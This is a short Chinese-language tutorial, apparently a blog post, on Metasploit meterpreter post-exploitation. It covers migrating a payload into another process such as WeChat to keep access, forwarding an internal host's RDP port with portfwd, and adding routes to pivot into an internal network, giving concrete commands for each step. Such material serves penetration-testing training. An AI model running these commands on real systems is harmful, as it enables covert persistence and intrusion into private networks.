本文我们简单的来说说。当我们利用msf获得系统shell后。常用的一些权限维持操作和端口转发等常见问题。

绑定进程

当目标系统成功反弹得到shell 。此时，我们要做的第一件事，就是将我们 PAYLOAD 的当前进程，转移注入到另外个可以维持我们持续权限的进程上！

首先运行ps命令，查看当前运行的程序。

选择指定程序的pid，然后通过下面命令来绑定即可。

migrate pid

如，这里我们使用微信的pid

端口转发和内网代理

portfwd是meterpreter提供的端口转发功能，在meterpreter下使用portfwd -h命令查看该命令的参数。

常用参数：

• -l：本地监听端口
• -r：内网目标的ip
• -p：内网目标的端口

实列

将目标局域网的192.168.123.129设备的3389端口转发到本地的8888端口。

portfwd add -l 8888 -r 192.168.123.129 -p 3389

连接远程桌面

rdesktop 127.0.0.1:8888

效果如下：

代理

pivot是msf最常用的代理，可以让我们使用msf提供的扫描模块对内网进行探测。

添加路由信息

格式如下：route add 内网ip 子网掩码 session的id

route add 192.168.0.22 255.255.255.0 24

路由添加成功之后就可以在msf里访问192.168.0.1/24这个网段了。